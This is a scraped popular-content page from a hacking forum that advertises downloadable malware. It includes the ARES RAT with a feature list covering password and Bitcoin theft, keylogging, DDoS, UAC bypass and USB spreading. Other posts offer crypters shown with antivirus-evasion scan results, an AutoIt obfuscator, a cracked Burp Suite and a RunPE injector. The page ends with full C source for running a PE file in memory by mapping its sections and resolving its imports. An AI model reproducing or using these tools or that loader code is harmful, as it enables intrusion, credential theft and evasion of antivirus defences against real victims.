Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Leaderboard


      Popular Content

      Showing content with the highest reputation on 04/13/2019 in all areas

      1. 3 points
        Version 6.4 FEATURES [Hide][Hidden Content]] Password: level23hacktools.com
      2. 2 points
        Scan: Download: [hide][Hidden Content]] Password: level23hacktools.com
      3. 2 points
        [Hidden Content] Anti-Virus Signature Date Detection AdAware 29.01.2019 Clean Arcabit 29.01.2019 Clean Avast 29.01.2019 Clean AVG 29.01.2019 Clean Avira 29.01.2019 Clean Bitdefender 29.01.2019 Clean Bullguard 29.01.2019 Clean ClamAV 29.01.2019 Clean Comodo 29.01.2019 Clean Cyren 29.01.2019 Clean Defender 29.01.2019 Clean eScan 29.01.2019 Clean Eset 29.01.2019 Clean FProt 29.01.2019 Clean FSecure 29.01.2019 Clean GData 29.01.2019 Clean Ikarus 29.01.2019 Clean Immunet 29.01.2019 Clean Kaspersky 29.01.2019 not-a-virus:HEUR:AdWare.Win32.Generic Sophos 29.01.2019 Clean Trustport 29.01.2019 Clean xVirus 29.01.2019 Clean Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      4. 1 point
        This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 1.2.1 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] [Hidden Content]/hackers/topic/44370-ares-rat-v100/ In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts [Hidden Content]/hackers/clients/donations/ In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- UPDATE VERSION --- ARES RAT v1.2.1 --- WHAT'S NEW IN THIS VERSION --- Add missing style library Changed target platform in ATENEA.exe (server) for NET. Framework 2.0 Repair active firewall tester //:::::::::::::::::::::::::::::::::::::::::::::::::::// --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      5. 1 point
        Requirements Java NET Framework 4.5 Compatible with modern Android systems 9.0 - Pie / Pie 8.0 - Orio / oreo 7.0 - Noga / Nogue 6.0 - Marshmallow / Marshmallow One of the most important features Multi-port Size 18.5 KB / Clean Encode with an insertion point Run more than one patch on one phone Secure data sent and received over the network Ability to control program settings And other features ... [HIDE][Hidden Content]] Pass: level23hacktools.com
      6. 1 point
        Not Support .NET Anti-Virus Signature Date Detection AdAware 27.03.2019 Clean Arcabit 27.03.2019 Clean Avast 27.03.2019 Clean AVG 27.03.2019 Clean Avira 27.03.2019 TR/Dropper.MSIL.Gen Bitdefender 27.03.2019 Clean Bullguard 27.03.2019 Clean ClamAV 27.03.2019 Clean Comodo 27.03.2019 Clean Cyren 27.03.2019 Clean Defender 27.03.2019 Clean eScan 27.03.2019 Clean Eset 27.03.2019 Clean FProt 27.03.2019 Clean FSecure 27.03.2019 Clean GData 27.03.2019 Clean Ikarus 27.03.2019 Clean Immunet 27.03.2019 Clean Kaspersky 27.03.2019 Clean Sophos 27.03.2019 Clean Trustport 27.03.2019 Clean xVirus 27.03.2019 Hacktool.Crypter.1 Scanner: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      7. 1 point
        [Hidden Content]
      8. 1 point
        This program has been created by dEEpEst --- RELEASES VERSION --- This version is version 1.0.0 has just been born --- DESCRIPTION --- This software is a remote administration tool --- LINKS --- [Hidden Content] In contruccioon .... --- TUTORIALS AND MANUALS --- [Hidden Content] In contruccioon .... --- AUTHORS --- [Hidden Content]/hackers/profile/1-deepest/ --- DONATE --- You can always help us by sending any amount to one of these accounts In contruccioon .... --- COPYRIGHT --- Its free distribution is allowed as long as the credits and links are respected --- TITLE & VERSION --- ARES RAT v1.0.0 --- DESCRIPTION --- ARES RAT is a remote administration tool. We can remotely control other computers millions of kilometers away. Things like viewing files, downloading them, changing registers, running programs, watching webcam, stealing BTC, stealing passwords, registering keystrokes, launching Ddos attacks, and many other things. --- FEATURES --- File Manager Remote Desktop Remote Cam Remote Shell Process Manager Run File from Disck Run File from Link Regedit Start Process Stop Process Run Script Notify Chat Keylooger Get Password Stealer Bitcoin DDos Atack Bypass UAC Disable/Enable Windows OFF Shutdown Restart IExplorer Home Page Windows Update ON/OFF Desktop Icons Show/Hide Taskbar Show/Hide Sound Mute/UnMute Sound Beep Speak Computer Play Music Hidden Error Sound CMD Enable/Disable CD Open/Close Clock Show/Hide Keyboard Block/UnBlock Mouse Reverse/Normal Cursor Show/Hide Monitor Turn Off/On Task Manager Enable/Disable Registry Enable/Disable System Restore Enable/Disable Open Website Get ClipBoard Copi IP User Info Computer Info Server Rename Server Update Server Closed/Restart Server Uninstall Extras Port Listen Password Lenguage (Only English) Change Styles Port Scanner IP Grabber Spoofer No-IP Binder Mutex Persistence Hide After Run Melt After Run Startup Copy folder temp Directory server Install Server folders Injection Svchost Antis Spread USB Block VirusTotal Change Icon Logs --- DISCLAIMERS --- You can use and distribute this tool freely, keep in mind that this tool is designed for student use and that you are responsible for the misuse that could be given. --- BUGS --- All the bugs can be repeated anywhere in the "About" tab, and I will try to correct it as soon as possible. --- PERSONAL NOTE --- For a long life for this warrior! Happy hacking! Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      9. 1 point
        UPDATE: Google AdWords has redesigned their user interface. The principles in this course are still very applicable, but you won't be able to follow the step-by-step portion of this course because the new interface looks very different. Learn how to create and manage profitable Google AdWords campaigns to get new customers and grow your small business’s bottom line. You will follow step-by-step guides to build your Google AdWords account and learn advanced tips from an agency pro who has managed millions of dollars in ad spend. Use Google AdWords to Grow Your Small Business and Make a Lot of Money Pick the right keywords Write ads that converts visitors into customers Get your ads higher and bigger than your competitors’ Use web and call tracking to know exactly how much money Google AdWords is making you Send people to the right pages on your website to increase your conversion rate Learn from a director at a top-rated Google Partner ad agency Google AdWords Can Be a Money Pit or a Profit-Generating Machine. Let's Build a Machine. Use Google AdWords to get people to your website who are searching for the products or services that you sell, at the exact moment that they are searching. Leads don't get hotter than that! You can show ads to people searching Google anywhere in the United States, (hey, the whole world!) or in a single zip code. John Horn is the director at an advertising agency that Google ranks in the top 5% of Google Partners worldwide for performance and customer care. He manages millions of dollars of ad spend for companies ranging from billion-dollar behemoths to tiny local businesses. If you want to use Google AdWords to make money, this course is right for you. This Course is NOT for: People training for Google's AdWords exams Large companies planning to spend $10,000s on AdWords This Course IS for: Small and medium businesses who want to make money using AdWords Who is this course for? This Google AdWords training course is meant for small businesses with little or no experience running Google AdWords. No prior experience with Google AdWords is needed. [Hidden Content]
      10. 1 point
        [Hidden Content]
      11. 1 point
        Recently added: - Outlook Password Recovery - Thunderbird Password Recovery - Reverse Proxy Download [Hidden Content] Pass level23hacktool
      12. 1 point
        Original Version / Clean 😃 [HIDE][Hidden Content]] Pass: level23hacktools.com
      13. 1 point
        OBFAU3 (Autoit-Obfuscator) Características del proceso de ofuscado Número de iteraciones del proceso de ofuscado. Enlazar includes desde otros ficheros del proyecto. Eliminar comentarios especificados por tags (comment-start/comment-end y cs/ce) Eliminar comentarios especificados por ; Eliminar comentarios especificados por # Eliminar regiones (#Region) Añadir nuevas regiones Ocultar nombres de variables Ocultar nombres de funciones Añadir funciones hardcodeadas especificadas en Hardcoded/HardcodedPrograms.py Añadir variables Añadir comentarios Añadir bloques de código generado al inicio Añadir bloques de código generado al final Añadir bloques de código generado entre lineas del código original. Añadir funciones Añadir llamadas a funciones Ocultar strings con método replace. Ocultar strings con método shuffle (genera codigo autoit para desordenar y ordenar las strings). Ocultar strings con método cipher (medio implementado por problemas con la salida de los algoritmos de PyCrypto). Ocultar strings con método reverse. Ofuscar enteros. Añadir directivas, incluido #pragma compile con datos generados. Añadir espacios y tabuladores en el código. Añadir símbolos en el EOF. Características de los bloques de código generados Generación de código y bloques If, For, Switch, Func y Simple (definiciones de nuevas variables haciendo uso de macros,constantes ofuscadas, funciones del lenguaje de aridades 0,1 y 2 y valores de tipos básicos) Definición del número mínimo y máximo de bloques a añadir. Definición del número mínimo y máximo de sentencias a añadir dentro del bloque (estas sentencias pueden ser a su vez nuevos bloques). Definición del número mínimo y máximo de condiciones lógicas a añadir en la guarda de los bloques generados. Definición del número mínimo y máximo de ElseIf dentro de un bloque If. Definición de la profundidad máxima de anidamiento de bloques generados. Definición de los valores mínimo y máximo de los enteros a usar en las definiciones (tiene sentido cuando se combina con la ofuscación de números). Posibilidad de añadir bloques al inicio, al final y entre medias del código original. Definición de la probabilidad de generación de nuevos bloques entre medias del código original. Definición del número mínimo y máximo de funciones a añadir. Definición de la aridad mínima y máxima de las funciones a añadir (define el número de parámetros de una función). Es necesario especificar todos estos valores en las tres posibilidades de adición de bloques (inicio,final,medio). Otras características Definición de la profundidad máxima en el ofuscado de enteros. Definición del tamaño en KB de la secuencia de símbolos a añadir tras el EOF. Variables declaradas con Local, Dim y Global. Considerado Call en las llamadas a funciones. (Considerar que el usuario pueda desactivarlo) Considerado Assign en las definiciones de variables. (Considerar que el usuario pueda desactivarlo) Considerado Eval. (Considerar que el usuario pueda desactivarlo) Alterar nombres de las funciones y palabras clave de AutoIt (Considerar que el usuario pueda desactivarlo) Posibilidad de combinar los métodos de ofuscado de strings disponibles. Implementado operador ternario (parece funcionar solo con algunas versiones de AutoIt, dar posibilidad de activarlo) Todos los parámetros de los procesos son elegidos de forma aleatoria entre los valores límite especificados por el usuario (incrementa la dispersión y permite incrementar la exploración del espacio de soluciones si se emplean algoritmos genéticos para optimizar los parámetros). Futuras versiones Algoritmo genético para optimizar los parámetros del proceso. GUI (Sadfud y Blau) Compilar automáticamente con Aut2Exe y variar sus parámetros (compresión, iconos, ...) Considerar arrays. Considerar constantes y enumeraciones (const y enum). (Reparando bugs) Añadir más funciones hardcodeadas. Añadir más métodos de ofuscado de strings. Parametrizar el script principal. Reordenación de código (tengo planteado algo usando grafos para tener en cuenta las dependencias). Dar la posibilidad de especificar más parámetros como el tamaño de los identificadores generados (esto se considera en las funciones implementadas pero no se deja al usuario especificarlo, puede reducir considerablemente el tamaño del código). Hardcodear instancias simples de problemas NP. Errores conocidos Duplicate name (function) -> Problema: Repetición del nombre de alguna función (al parecer ocurre cuando se añaden directivas include repetidas). Solución: Volver a ejecutar el ofuscador (desactivar la función de añadir directivas). Error in expresion -> Problema: Error en algún Switch generado Solución: Volver a ejecutar el ofuscador. Error subscripted array -> Problema: Error general, fuente desconocida. Solución: Volver a ejecutar el ofuscador, error general, fuente desconocida. Undefined variable -> Problema: Se hace uso de una variable no definida en alguna evaluación. Generalmente ocurre cuando se intentan ocultar variables y se hace uso en el código de constantes AutoIt. Solución: Desactivar la función de ocultar variables. (Intentad volviendo a ejecutar el ofuscador) Only Object-type variables allowed in a "With" statement -> Problema: La variable especificada en la guarda del bloque With no es un objeto. Ocurre por una inicialización incorrecta de es tipo de bloques. Solución: Volver a ejecutar el ofuscador. Variable must be of type "Object" -> Problema: Alguna variable no es del tipo esperado (Object) en alguna expresión. Fuente desconocida. Solución: Volver a ejeutar el ofuscador. Changelog 1 Añadidos bloques For ... In, With, While y Do ... Until. Creación y uso de objetos COM. Operador ternario. Enums y consts (bug). Reparado el bug al ocultar variables no definidas por el usuario. Considerado Step en bucles For ... To. Añadidas cuatro funciones hardcodeadas. Añadido método para split para ofuscar strings. Actualizada la lista de errores y soluciones. Changelog 2 Añadidas condiciones siempre ciertas en el código inicial. Expresiones regulares precompiladas. Añadidas más funciones hardcodeadas. Añadido método rotate para ofuscado de strings. Arreglado bug en hide var names. Arreglado bug en hide func names. Arreglado bug en true guard statements. Arreglado Error in expresion. Arreglado Only Object-type variables allowed in a "With" statement. Arreglado Variable must be of type "Object". Detectada la fuente de subscripted array (alguna de las funciones hardcodeadas). Mejorada la estabilidad. ##Changelog 3 Arreglados bugs con los ofuscados de strings (replace,reverse,flip_two,split,rotate), shuffle sigue dando problemas. Mejorado el ofuscado de strings. Arreglados bugs con los ofuscados de nombres de variables. Arreglado bug al eliminar comentarios que empiezan por # (hash). Arreglado bug al eliminar comentarios que empiezan por ; Añadidos snippets de [Hidden Content] como funciones hardcodeadas. Añadida función para llamar a las funciones hardcodeadas. Añadido nuevo método de ofuscado de strings, hexify (BinaryToString , StringToBinary). La longitud de las strings, con este método, se duplica, si supera el tamaño máximo de linea (Unterminated string) usar junto método split. Arreglados bugs al añadir funciones hardcodeadas. Extraídos mensajes para permitir traducciones. Mejorado el aspecto de la salida por consola. ##Changelog 4 Añadido fichero de configuración del proceso. Todos los parámetros se gestionan ahora desde config.ini. Traducción al Español y Portugués (Spanish,English,Portuguese disponibles). Posibilidad de cambiar de idioma. Ocultados parámetros de funciones. Soporte a ByRef y valores por defecto en parámetros de funciones. Mejorada la estabilidad en la ofuscación de nombres de variables, funciones y parámetros. Generado ejecutable. Añadidos todos los snippets AutoIt ([Hidden Content]) sin dependencias ni efectos visibles (+30). Arreglado método shuffle para ocultar strings. Cuidado con las combinaciones, duplica el tamaño de las strings. Detectados problemas en algunas funciones hardcodeadas (se depurará en la siguiente versión). ##Changelog 5 Arregladas las funciones hardcodeadas (junto con la adición de bloques aleatorios pueden darse situaciones que corrompan el script, volver a ofuscar o reducir el número de funciones hardcodeadas). Error Unable to parse line, se soluciona volviendo a ejecutar el script ofuscado. Arreglado bug al ocultar parámetros de funciones hardcodeadas (ahora no se ocultan en estas funciones). Algunos problemas se solucionan por la profundidad de ofuscado de números (recomendado entre 1 y 2 o entre 1 y 1). Realizadas pruebas con más scripts (los resultados han sido muuy buenos). Compilación automática de los scripts con Aut2Exe y posibilidad de cambiar parámetros de compilación en config.ini. Mejorado el procesamiento de parámetros. Download: [HIDE][Hidden Content]]
      14. 1 point
      15. 1 point
        [HIDE][Hidden Content]]
      16. 1 point
        [Hidden Content]
      17. 1 point
        [Hidden Content]
      18. 1 point
        [Hidden Content]
      19. 1 point
      20. 1 point
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      21. 1 point
      22. 1 point
        Info: [Hidden Content] Thousands of organizations use Burp Suite to find security exposures before it’s too late. By using cutting-edge scanning technology, you can identify the very latest vulnerabilities. Our researchers frequently uncover brand new vulnerability classes that Burp is the first to report. What is Burp Suite you ask? Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information. In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed. Penetration testers can pause, manipulate and replay individual HTTP requests in order to analyze potential parameters or injection points. Injection points can be specified for manual as well as automated fuzzing attacks to discover potentially unintended application behaviors, crashes and error messages. Please use Java 8 because from version 9 and up xbootclasspath argument has been disabled. Works only with Java 8. [Hidden Content] Pass: level23hacktools.com
      23. 1 point
        README.md Memory PE Injector A tool that reads a PE file from a byte array buffer and injects it into memory. Symmary Memory PE Injector is a C++ class which reads an executable file (PE) from a byte array and maps it into the memory space of another process. This is commonly known as Process Forking or RunPE. To accomplish this, the code follows these steps: The code launches a second instance of the program containing the code, in suspended mode. It unmaps the PE from the virtual memory space where it is loaded The given PE byte array is then mapped in place. The process is resumed and the end result is the PE file of the byte array running instead. Usage and Tips This code can be used in various scenarios. One of these scenarios is a case where you want to pack another program with your own one, but you'd like to deploy one executable only. You can add your second program in the resources of your first one, in an RT_RCDATA resource, then read the bytes and inject it directly into memory, without dropping it on the disk. Usage: Injector *injector = new Injector(); unsigned char *lpByteBuffer = injector->ReadFileBytes(L"C:/The/path/to/your/executable.exe"); injector->Inject(lpByteBuffer); Download: [Hidden Content]
      24. 1 point
        [PHP] Account Generator Source --------------------------------- Ex Txt File: Username1:Password1 Username2:Password2 Username3:Password3 Username4:Password4 How it looks: [HIDE-THANKS] ><?php $text = file_get_contents('YOURTEXTFILE.txt'); $textArray = explode("\n", $text); $randArrayIndexNum = array_rand($textArray); $randPhrase = $textArray[$randArrayIndexNum]; ?> <?php echo $randPhrase; ?> Refresh the page to get a new account [/HIDE-THANKS]
      25. 1 point
        This Method need to compile your payload with 0x500000 Image base spiteful: PoC : Code : [HIDE-THANKS] > #include #include #include /* In memory execution example */ /* Author: Amit Malik [Hidden Content] Compile in Dev C++ */ #define DEREF_32( name )*(DWORD *)(name) int main() { char file[20]; HANDLE handle; PVOID vpointer; HINSTANCE laddress; LPSTR libname; DWORD size; DWORD EntryAddr; int state; DWORD byteread; PIMAGE_NT_HEADERS nt; PIMAGE_SECTION_HEADER section; DWORD dwValueA; DWORD dwValueB; DWORD dwValueC; DWORD dwValueD; printf("Enter file name: "); scanf("%s",&file); // read the file printf("Reading file..\n"); handle = CreateFile(file,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); // get the file size size = GetFileSize(handle,NULL); // Allocate the space vpointer = VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_READWRITE); // read file on the allocated space state = ReadFile(handle,vpointer,size,&byteread,NULL); CloseHandle(handle); printf("You can delete the file now!\n"); system("pause"); // read NT header of the file nt = PIMAGE_NT_HEADERS(PCHAR(vpointer) + PIMAGE_DOS_HEADER(vpointer)->e_lfanew); handle = GetCurrentProcess(); // get VA of entry point EntryAddr = nt->OptionalHeader.ImageBase + nt->OptionalHeader.AddressOfEntryPoint; // Allocate the space with Imagebase as a desired address allocation request PVOID memalloc = VirtualAllocEx( handle, PVOID(nt->OptionalHeader.ImageBase), nt->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // Write headers on the allocated space WriteProcessMemory(handle, memalloc, vpointer, nt->OptionalHeader.SizeOfHeaders, 0 ); // write sections on the allocated space section = IMAGE_FIRST_SECTION(nt); for (ULONG i = 0; i < nt->FileHeader.NumberOfSections; i++) { WriteProcessMemory( handle, PCHAR(memalloc) + section[i].VirtualAddress, PCHAR(vpointer) + section[i].PointerToRawData, section[i].SizeOfRawData, 0 ); } // read import dirctory dwValueB = (DWORD) &(nt->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_IMPORT]); // get the VA dwValueC = (DWORD)(nt->OptionalHeader.ImageBase) + ((PIMAGE_DATA_DIRECTORY)dwValueB)->VirtualAddress; while(((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->Name) { // get DLL name libname = (LPSTR)(nt->OptionalHeader.ImageBase + ((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->Name); // Load dll laddress = LoadLibrary(libname); // get first thunk, it will become our IAT dwValueA = nt->OptionalHeader.ImageBase + ((PIMAGE_IMPORT_DESCRIPTOR)dwValueC)->FirstThunk; // resolve function addresses while(DEREF_32(dwValueA)) { dwValueD = nt->OptionalHeader.ImageBase + DEREF_32(dwValueA); // get function name LPSTR Fname = (LPSTR)((PIMAGE_IMPORT_BY_NAME)dwValueD)->Name; // get function addresses DEREF_32(dwValueA) = (DWORD)GetProcAddress(laddress,Fname); dwValueA += 4; } dwValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); } // call the entry point :: here we assume that everything is ok. ((void(*)(void))EntryAddr)(); } [/HIDE-THANKS]